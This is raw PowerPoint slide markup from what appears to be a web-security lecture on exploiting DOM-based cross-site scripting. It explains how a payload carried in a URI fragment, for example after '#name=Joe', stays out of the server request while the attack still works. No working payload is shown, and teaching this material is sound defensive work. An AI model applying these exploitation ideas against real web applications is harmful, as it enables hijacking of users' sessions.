          <a:xfrm>
            <a:off x="2484967" y="2078567"/>
            <a:ext cx="7205133" cy="2700867"/>
            <a:chOff x="1863725" y="1558925"/>
            <a:chExt cx="5403850" cy="2025650"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="object 55"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1898649" y="1593850"/>
              <a:ext cx="5346699" cy="1968499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="object 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1878012" y="1573212"/>
              <a:ext cx="5375275" cy="1997075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5375275" h="1997075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5375275" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5375275" y="1997075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1997075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="131821"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="object 57"/>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097" y="450262"/>
            <a:ext cx="8516620" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Based</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-33" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1526373"/>
            <a:ext cx="10579100" cy="4375493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="114300" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" marR="985495" indent="-457189">
              <a:lnSpc>
                <a:spcPts val="3200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URI)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>still </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>might</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>logged.</a:t>
            </a:r>
            <a:endParaRPr sz="3333">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-457189">
              <a:lnSpc>
                <a:spcPts val="3200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>applications,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>fragment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pass </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>arguments</a:t>
            </a:r>
            <a:endParaRPr sz="3333">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:lnSpc>
                <a:spcPts val="3513"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1008355" algn="l"/>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>E.g.,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Gmail,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Twitter,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Facebook,</a:t>
            </a:r>
            <a:endParaRPr sz="2933">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:lnSpc>
                <a:spcPts val="3720"/>
              </a:lnSpc>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>previous</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3333" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>example:</a:t>
            </a:r>
            <a:endParaRPr sz="3333">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.net/welcome.php#name=Joe</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" marR="461422" lvl="1" indent="-382684">
              <a:lnSpc>
                <a:spcPts val="2813"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="673"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1008355" algn="l"/>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>doesn’t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>fragment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“#name=Joe”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-640" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>as part</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:endParaRPr sz="2933">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="27"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1008355" algn="l"/>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>still</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2933" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> exists</a:t>
            </a:r>
            <a:endParaRPr sz="2933">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>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5" name="object 5"/>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grpSp>
        <p:nvGrpSpPr>
